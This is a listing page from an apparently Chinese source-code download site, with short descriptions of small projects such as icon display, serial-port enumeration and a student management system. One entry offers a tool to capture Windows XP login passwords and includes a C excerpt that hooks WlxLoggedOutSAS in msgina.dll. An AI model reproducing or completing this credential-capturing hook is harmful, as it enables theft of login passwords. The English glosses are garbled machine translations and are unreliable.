-
show ico icon procedures
显示ico图标的程序-show ico icon procedures
- 2022-04-15 23:32:49下载
- 积分:1
-
读硬盘参数的源代码
读硬盘参数的源代码-Reading drive parameters of the source code
- 2022-07-01 10:35:21下载
- 积分:1
-
VFP代码录入小程序,小例子,大家看看,可能会有帮助,好了
VFP代码录入小程序,小例子,大家看看,可能会有帮助,好了-VFP code entry procedures for small, small examples, we see that may be helpful, a good
- 2022-10-11 21:00:03下载
- 积分:1
-
This is a set of procedures for beginners
这是java的一套程序,适合初学者-This is a set of procedures for beginners
- 2022-06-20 15:59:10下载
- 积分:1
-
此源代码是用来获取所有串口的。VB6.0已经实现
此源代码是用来获取所有串口的。VB6.0已经实现-This source code is used to obtain all the serial. VB6.0 has been achieved
- 2023-06-27 08:40:03下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
是一个经典的源代码论坛环境
是一个ASP环境下的经典论坛源代码-ASP is a classic environment of the source code Forum
- 2023-06-08 22:40:03下载
- 积分:1
-
用于jsp的日期转换
用于jsp的日期转换-jsp for the date change
- 2022-08-13 11:42:40下载
- 积分:1
-
Based on outstanding passes the packing which the Chinese sound
TTS function tra...
基于杰通华声TTS功能调用的包装, 编译目标是DLL文件- Based on outstanding passes the packing which the Chinese sound
TTS function transfers, the translation goal is the DLL document
- 2022-01-27 23:25:59下载
- 积分:1
-
C语言写的一个学生管理系统【指针版本】
用C语言写的一个运动管理系统,属于新手入门项目,新手可以参照看一下,我以前学C的时候被CSDN 的那些小白写的代码害惨了,现在自己会了,想分享给大家一个能运行的版本;
- 2022-02-12 10:43:26下载
- 积分:1